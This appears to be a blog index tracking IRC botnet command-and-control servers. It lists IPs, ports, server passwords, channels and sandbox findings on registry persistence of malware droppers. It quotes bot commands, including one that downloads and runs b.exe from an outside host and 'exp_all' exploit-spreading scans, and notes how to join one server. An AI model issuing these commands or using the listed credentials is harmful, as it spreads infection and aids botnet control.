ms4all.twoplayers.net(very big botnet)

Uncategorized

This one is special because u have to make some modifications on your irc client to join the server ms4all.twoplayers.net DNS_TYPE_A 204.45.85.218 109.196.130.50 109.196.130.66 204.45.85.210 204.45.85.218:57221 PASS laorosr Channel#dpi Channel#! Now talking in #! Topic is ‘.asc -S|.http http://208.53.183.101/b.exe|.asc exp_all 25 5 0 -a -r -e|.asc exp_all 25 5 0 -b -r -e|.asc exp_all 20Read more...

80.247.72.130

Uncategorized

Remote Host Port Number 80.247.72.130 3305 PASS secretpass NICK P|v403incrp USER x6yyqf02y * 0 :USA|XP|257 USERHOST P|v403incrp MODE P|v403incrp JOIN #mm RSA Other details * The following ports were open in the system: Port Protocol Process 69 UDP unwise_.exe (%FontsDir%unwise_.exe) 1055 TCP unwise_.exe (%FontsDir%unwise_.exe) 11030 TCP unwise_.exe (%FontsDir%unwise_.exe) Registry Modifications * The following Registry KeysRead more...

210.166.223.51

Uncategorized

Remote Host Port Number 210.166.223.51 3305 PASS secretpass NICK P|b2s5zj80q USER cb5tcxdf2 * 0 :USA|XP|373 USERHOST P|b2s5zj80q MODE P|b2s5zj80q JOIN #mm RSA Other details * The following ports were open in the system: Port Protocol Process 69 UDP unwise_.exe (%FontsDir%unwise_.exe) 1052 TCP unwise_.exe (%FontsDir%unwise_.exe) 1138 TCP unwise_.exe (%FontsDir%unwise_.exe) 1139 TCP unwise_.exe (%FontsDir%unwise_.exe) 1140 TCP unwise_.exeRead more...

62.193.249.122

Uncategorized

Remote Host Port Number 62.193.249.122 3305 PASS secretpass NICK P|zmm6xnq61 USER bv41i7oge * 0 :USA|XP|932 USERHOST P|zmm6xnq61 MODE P|zmm6xnq61 JOIN #mm RSA Other details * The following ports were open in the system: Port Protocol Process 69 UDP unwise_.exe (%FontsDir%unwise_.exe) 1053 TCP unwise_.exe (%FontsDir%unwise_.exe) 38045 TCP unwise_.exe (%FontsDir%unwise_.exe) Registry Modifications * The following Registry KeysRead more...

74.3.255.162

Uncategorized

Remote Host Port Number 74.3.255.162 81 NICK n[USA|XP]7375347 USER s “” “lol” :s JOIN #newbin# PONG 422 JOIN #USA (null) * The following port was open in the system: Port Protocol Process 1055 TCP lmsn.exe (%AppData%lmsn.exe) Registry Modifications * The newly created Registry Value is: o [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun] + Windows System Guard = “%AppData%lmsn.exe” so thatRead more...

92.243.21.78(Virus from Saudi Arabia botnets)

Uncategorized

Remote Host Port Number 92.243.12.218 3211 92.243.21.78 3211 92.243.22.188 3211 NICK {NEW}[USA][XP-SP2]801696 NICK [USA][XP-SP2]784622 USER VirUs “” “lol” :4628 NICK [USA][XP-SP2]957255 USER VirUs “” “lol” :6212 USER VirUs “” “lol” :3708 NICK [USA][XP-SP2]707206 USER VirUs “” “lol” :6114 NICK [USA][XP-SP2]028704 USER VirUs “” “lol” :3165 NICK [USA][XP-SP2]934755 USER VirUs “” “lol” :7750 NICK 9552 NICKRead more...

92.243.22.188(VirUs botnet)

Uncategorized

Remote Host Port Number 92.243.22.188 3211 NICK {NOVY}[USA][XP-SP2]864460 USER VirUs “” “lol” :3037 JOIN #sWo2# VrX PRIVMSG #sWo2# :Registry/Processes cleaned. PONG :kindly.dont.suspend Registry Modifications * The newly created Registry Values are: o [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun] + Driver Control Manager v1.0 = “%Temp%MCDT.exe” so that MCDT.exe runs every time Windows starts o [HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun] + Driver Control Manager v1.0Read more...

92.241.164.101

Uncategorized

Remote Host Port Number 204.13.248.70 80 72.233.89.200 80 92.38.226.3 80 92.241.164.101 47221 PASS weed PRIVMSG {iNF-00-USA-XP-CX @ :186.5kb downloaded to C:DOCUME~1UserNameLOCALS~1Temptempfile05130.exe (93.3kbps) QUIT Updating… NICK {iNF-00-USA-XP-COMP-6189} USER blaze * 0 :COMP JOIN #crimbot NICK {00-USA-XP-COMP-8330} * The data identified by the following URLs was then requested from the remote web server: o http://checkip.dyndns.org/ o http://www.whatismyip.com/Read more...

67.210.170.178

Uncategorized

Remote Host Port Number 67.210.170.178 4676 USER dpvaji dpvaji dpvaji :gcgdshoooukvmzmx NICK d[TjTDCXB]b Other details * The following port was open in the system: Port Protocol Process 1055 TCP winamp.exe (%System%winamp.exe) Registry Modifications * The newly created Registry Value is: o [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun] + Winamp Agent = “%System%winamp.exe” so that winamp.exe runs every time Windows startsRead more...